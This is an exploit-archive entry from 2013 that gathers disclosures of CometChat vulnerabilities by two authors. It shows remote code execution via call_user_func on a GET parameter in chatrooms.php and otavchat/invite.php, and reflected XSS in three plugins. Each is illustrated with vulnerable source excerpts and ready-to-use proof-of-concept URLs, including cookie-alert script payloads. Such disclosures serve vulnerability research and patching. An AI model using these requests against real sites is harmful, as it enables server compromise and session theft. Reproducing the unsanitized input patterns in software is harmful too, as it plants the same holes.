Cometchat - Multiple Vulnerabilities

2013-02-15T00:00:00
ID 1337DAY-ID-20370
Type zdt
Reporter B127Y
Modified 2013-02-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################################################
       __            _                      _            ____           
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, / 
                                                                /____/  
##################################################################################                                                             
Cometchat chat Application All Version Multiple Vulnerabilities
Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts

 
Author(Pentester): B127Y
Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
Jani Exploit id 1 (http://www.janissaries.org/exploits/1)
##################################################################################
 
 
 
1.)Code Execution P0C (modules/chatrooms/chatrooms.php)
call_user_func call_user_func($_GET['action']);
Can use all php functions and cometchat function without arguments
 
Live Demo:http://server/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo
 
2.)XSS P0C (plugins/handwrite/index.php)
echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <title>{$handwrite_language[0]}</title>   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>     <style>  html, body, div, span, applet, object, iframe,  h1, h2, h3, h4, h5, h6, p, blockquote, pre,  a, abbr, acronym, address, big, cite, code,  del, dfn, em, font, img, ins, kbd, q, s, samp,  small, strike, strong, sub, sup, tt, var,  dl, dt, dd, ol, ul, li,  fieldset, form, label, legend,  table, caption, tbody, tfoot, thead, tr, th, td {   margin: 0;   padding: 0;   border: 0;   outline: 0;   font-weight: inherit;   font-style: inherit;   font-size: 100%;   font-family: inherit;   vertical-align: baseline;      text-align: center;  }    html {    height: 100%;    overflow: hidden; /* Hides scrollbar in IE */  }    body {    height: 100%;    margin: 0;    padding: 0;  }    #flashcontent {    height: 100%;  }      </style>      </style>    </head>  <body><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"          codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0"          width="100%"          height="100%"          align="middle"          id="main">      <param name="allowScriptAccess" value="sameDomain" />      <param name="movie" value="handwriting.swf" />      <param name="quality" value="high" />      <param name="bgcolor" value="#ffffff" />      <param name="FlashVars" value="tid={$toId}" />       <param name="scale" value="exactFit" />      <embed src="handwriting.swf"             width="100%"             height="100%"             autostart="false"             quality="high"             bgcolor="#ffffff"             FlashVars="tid={$toId}"             name="main"             align="middle"             allowScriptAccess="sameDomain"             type="application/x-shockwave-flash"             pluginspage="http://www.macromedia.com/go/getflashplayer" />  </object></body>  </html>  EOD;
$toId = $_GET['id'];
 
Live Demo:http://server/cometchat/plugins/handwrite/index.php?id="><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

#########
# z3r0sPl0iT #
#########

Info:
All Cometchat Application Multiple Vulnerabilities
Cometchat is a application which can be used in many site for example phpFox, Wordpress, Joomla, MyBB, Elgg etc.
Homepage : http://www.cometchat.com

Author: z3r0sPlOiT
Date: 17.02.2013

Special Thanks: I would like to thank B127Y. He already found two vulnerabilities for Cometchat and because of this I started my research.


1.)Code Execution P0C (plugins/otavchat/invite.php)
194: call_user_func call_user_func($_GET['action']); 
Can use all php functions and cometchat function without arguments

Live Demo: http://server/cometchat/plugins/otavchat/invite.php?action=phpinfo

2.)XSS P0C (plugins/otavchat/invite.php)
137: echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>   <title>{$otavchat_language[18]}</title>   <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/otavchat{$rtl}.css" />   </head>  <body>  <form method="post" action="invite.php?action=inviteusers">  <div class="container2">  <div style="background-color:#3E92BD;border-bottom:1px solid #11648F;">   <div class="invitetitle">{$otavchat_language[16]}</div><div style="float:right"><input type=submit value="{$otavchat_language[17]}" class="invitebutton"></div>   <div style="clear:both"></div>  </div>    <div style="height:162px;overflow-x:hidden;overflow-y:scroll;clear:both;padding-left:5px;padding-top:5px;padding-bottom:5px;">{$s['available']}{$s['away']}{$s['offline']}</div>  </div>    <input type="hidden" name="roomid" value="$id">  </form>  </body>  </html>  EOD; 
87: $id = $_GET['roomid'];

Live Demo: http://server/cometchat/plugins/otavchat/invite.php?roomid="><script>alert(document.cookie)</script>


3.)XXS P0C (plugins/filetransfer/index.php)
87: echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>  <title>{$filetransfer_language[0]}</title>   <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/filetransfer{$rtl}.css" />   <script type="text/javascript" src="styleinput.js"></script>  </head>    <body><form name="upload" action="upload.php" method="post" enctype="multipart/form-data">  <div class="container">  <div class="container_title">{$filetransfer_language[1]}</div>    <div class="container_body">    <div class="container_body_1">{$filetransfer_language[2]}</div>  <div id="select-0" class="container_body_2"><label class="cabinet"><input type="file" class="file" name="Filedata" onchange="javascript:document.upload.submit()"/></label></div>    <div class="container_body_3">{$filetransfer_language[4]}</div>  <div style="clear:both"></div>      <div class="container_body_4">{$filetransfer_language[3]}</div>    <input type="hidden" name="to" value="{$toId}">  <input type="hidden" name="chatroommode" value="{$chatroommode}">    </div>  </div>  </div>    <script>  SI.Files.stylizeAll();  </script>  </form>  </body>  </html>  EOD; 
79: $toId = $_GET['id']; 

Live Demo: http://server/cometchat/plugins/filetransfer/index.php?id="><script>alert(document.cookie)</script>

#  0day.today [2018-02-18]  #